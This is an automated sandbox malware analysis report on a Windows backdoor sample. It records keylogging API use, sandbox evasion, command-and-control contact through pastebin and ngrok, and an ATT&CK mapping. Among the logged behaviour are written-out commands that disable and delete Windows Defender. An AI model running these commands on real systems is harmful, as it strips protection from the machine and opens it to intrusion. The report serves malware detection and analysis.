          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: G1lnGpOLK4.exe, 00000000.00000002.4074957187.00000000130AD000.00000004.00000800.00020000.00000000.sdmp, G1lnGpOLK4.exe, 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: WIRESHARK.EXECHTTPS://PASTEBIN.COM/RAW/S4TIPMJTNULL
          Source: G1lnGpOLK4.exe, 00000000.00000002.4072983013.00000000030A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeMemory allocated: EA0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeMemory allocated: 30A0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeMemory allocated: 1B0A0000 memory commit | memory reserve | memory write watchJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeWindow / User API: threadDelayed 3584Jump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeWindow / User API: threadDelayed 5709Jump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeWindow / User API: foregroundWindowGot 1776Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6366Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3314Jump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exe TID: 2484Thread sleep count: 155 > 30Jump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exe TID: 2484Thread sleep time: -155000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exe TID: 8128Thread sleep count: 3584 > 30Jump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exe TID: 2484Thread sleep count: 5709 > 30Jump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exe TID: 2484Thread sleep time: -5709000s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8048Thread sleep count: 6366 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8048Thread sleep count: 3314 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8160Thread sleep time: -7378697629483816s >= -30000sJump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: G1lnGpOLK4.exe, 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: VBoxService%\\.\PhysicalDrive0
          Source: G1lnGpOLK4.exe, 00000000.00000002.4071932100.0000000000F75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, kl.csReference to suspicious API methods: MapVirtualKey(a, 0u)
          Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, kl.csReference to suspicious API methods: GetAsyncKeyState(num2)
          Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, OK.csReference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeProcess created: C:\Windows\System32\cmd.exe cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $true
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeProcess created: C:\Windows\System32\cmd.exe cmd /c sc stop windefend
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeProcess created: C:\Windows\System32\cmd.exe cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $trueJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeProcess created: C:\Windows\System32\cmd.exe cmd /c sc stop windefendJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $trueJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeProcess created: C:\Windows\System32\cmd.exe cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $true
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeProcess created: C:\Windows\System32\cmd.exe cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $trueJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $trueJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $trueJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query windefendJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop windefendJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc delete windefendJump to behavior
          Source: G1lnGpOLK4.exe, 00000000.00000002.4071932100.0000000000F75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager.3.16
          Source: G1lnGpOLK4.exe, 00000000.00000002.4071932100.0000000000F75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerrok.ioH
          Source: G1lnGpOLK4.exe, 00000000.00000002.4071932100.0000000000F75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerrok.ioM
          Source: G1lnGpOLK4.exe, 00000000.00000002.4071932100.0000000000F75000.00000004.00000020.00020000.00000000.sdmp, G1lnGpOLK4.exe, 00000000.00000002.4074957187.00000000130AD000.00000004.00000800.00020000.00000000.sdmp, G1lnGpOLK4.exe, 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: Program Manager
          Source: G1lnGpOLK4.exe, 00000000.00000002.4071932100.0000000000F75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager b
          Source: G1lnGpOLK4.exe, 00000000.00000002.4074957187.00000000130AD000.00000004.00000800.00020000.00000000.sdmp, G1lnGpOLK4.exe, 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: Progman
          Source: G1lnGpOLK4.exe, 00000000.00000002.4071932100.0000000000F75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managero
          Source: G1lnGpOLK4.exe, 00000000.00000002.4071932100.0000000000F75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager0
          Source: G1lnGpOLK4.exe, 00000000.00000002.4071932100.0000000000F75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerm
          Source: G1lnGpOLK4.exe, 00000000.00000002.4074957187.00000000130AD000.00000004.00000800.00020000.00000000.sdmp, G1lnGpOLK4.exe, 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd+set CDAudio door open/set CDAudio door closed
          Source: G1lnGpOLK4.exe, 00000000.00000002.4071932100.0000000000F75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managermk.ioe
          Source: G1lnGpOLK4.exe, 00000000.00000002.4072983013.000000000318B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managerx
          Source: G1lnGpOLK4.exe, 00000000.00000002.4071932100.0000000000F75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerrok.io|
          Source: G1lnGpOLK4.exe, 00000000.00000002.4071932100.0000000000F75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managero?
          Source: G1lnGpOLK4.exe, 00000000.00000002.4071932100.0000000000F75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager@
          Source: G1lnGpOLK4.exe, 00000000.00000002.4071932100.0000000000F75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager`[
          Source: G1lnGpOLK4.exe, 00000000.00000002.4071932100.0000000000F75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerrok.io
          Source: G1lnGpOLK4.exe, 00000000.00000002.4071932100.0000000000F75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager|
          Source: G1lnGpOLK4.exe, 00000000.00000002.4071932100.0000000000F75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerYQ
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Lowering of HIPS / PFW / Operating System Security Settings

          barindex
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeRegistry value created: HKEY_CURRENT_USER\Environment SEE_MASK_NOZONECHECKSJump to behavior
          Source: G1lnGpOLK4.exe, 00000000.00000002.4072983013.00000000030A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Wireshark.exe

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.G1lnGpOLK4.exe.1390000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.4074957187.00000000130AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: G1lnGpOLK4.exe PID: 2472, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.G1lnGpOLK4.exe.1390000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.4074957187.00000000130AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: G1lnGpOLK4.exe PID: 2472, type: MEMORYSTR
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Service Execution
          1
          Windows Service
          1
          Windows Service
          31
          Disable or Modify Tools
          1
          Input Capture
          1
          Query Registry
          Remote Services1
          Input Capture
          1
          Web Service
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Native API
          1
          DLL Side-Loading
          12
          Process Injection
          31
          Virtualization/Sandbox Evasion
          LSASS Memory111
          Security Software Discovery
          Remote Desktop Protocol1
          Archive Collected Data
          11
          Encrypted Channel
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
          DLL Side-Loading
          12
          Process Injection
          Security Account Manager2
          Process Discovery
          SMB/Windows Admin SharesData from Network Shared Drive1
          Non-Standard Port
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          Obfuscated Files or Information
          NTDS31
          Virtualization/Sandbox Evasion
          Distributed Component Object ModelInput Capture1
          Ingress Tool Transfer
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
          Software Packing
          LSA Secrets1
          Application Window Discovery
          SSHKeylogging2
          Non-Application Layer Protocol
          Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          DLL Side-Loading
          Cached Domain Credentials12
          System Information Discovery
          VNCGUI Input Capture13
          Application Layer Protocol
          Data Transfer Size LimitsService Stop
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1435109 Sample: G1lnGpOLK4.exe Startdate: 02/05/2024 Architecture: WINDOWS Score: 100 46 pastebin.com 2->46 48 0.tcp.eu.ngrok.io 2->48 62 Multi AV Scanner detection for domain / URL 2->62 64 Found malware configuration 2->64 66 Malicious sample detected (through community Yara rule) 2->66 70 11 other signatures 2->70 9 G1lnGpOLK4.exe 17 4 2->9         started        13 chrome.exe 1 2->13         started        signatures3 68 Connects to a pastebin service (likely for C&C) 46->68 process4 dnsIp5 52 0.tcp.eu.ngrok.io 18.192.31.165, 15155, 49749, 49754 AMAZON-02US United States 9->52 54 pastebin.com 104.20.3.235, 443, 49745, 49753 CLOUDFLARENETUS United States 9->54 56 3.124.142.205, 15155, 49777, 49779 AMAZON-02US United States 9->56 72 Disables zone checking for all users 9->72 74 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 9->74 76 Modifies Windows Defender protection settings 9->76 78 Disables Windows Defender (via service or powershell) 9->78 15 cmd.exe 1 9->15         started        18 cmd.exe 1 9->18         started        20 cmd.exe 1 9->20         started        22 cmd.exe 1 9->22         started        58 192.168.2.4, 138, 15155, 443 unknown unknown 13->58 60 239.255.255.250 unknown Reserved 13->60 24 chrome.exe 13->24         started        signatures6 process7 dnsIp8 82 Modifies Windows Defender protection settings 15->82 84 Disables Windows Defender (via service or powershell) 15->84 27 powershell.exe 23 15->27         started        30 conhost.exe 15->30         started        32 conhost.exe 18->32         started        34 sc.exe 1 18->34         started        36 conhost.exe 20->36         started        38 sc.exe 1 20->38         started        40 conhost.exe 22->40         started        42 sc.exe 1 22->42         started        50 www.google.com 142.251.40.228, 443, 49733, 49734 GOOGLEUS United States 24->50 signatures9 process10 signatures11 80 Loading BitLocker PowerShell Module 27->80 44 WmiPrvSE.exe 27->44         started        process12

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          G1lnGpOLK4.exe68%ReversingLabsByteCode-MSIL.Backdoor.Bladabhindi
          G1lnGpOLK4.exe71%VirustotalBrowse
          G1lnGpOLK4.exe100%AviraTR/Dropper.Gen
          G1lnGpOLK4.exe100%Joe Sandbox ML
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          0.tcp.eu.ngrok.io16%VirustotalBrowse
          SourceDetectionScannerLabelLink
          0.tcp.eu.ngrok.io0%Avira URL Cloudsafe
          0.tcp.eu.ngrok.io16%VirustotalBrowse
          NameIPActiveMaliciousAntivirus DetectionReputation
          www.google.com
          142.251.40.228
          truefalse
            high
            pastebin.com
            104.20.3.235
            truefalse
              high
              0.tcp.eu.ngrok.io
              18.192.31.165
              truetrueunknown
              NameMaliciousAntivirus DetectionReputation
              https://www.google.com/async/newtab_promosfalse
                high
                https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgwfalse
                  high
                  https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0false
                    high
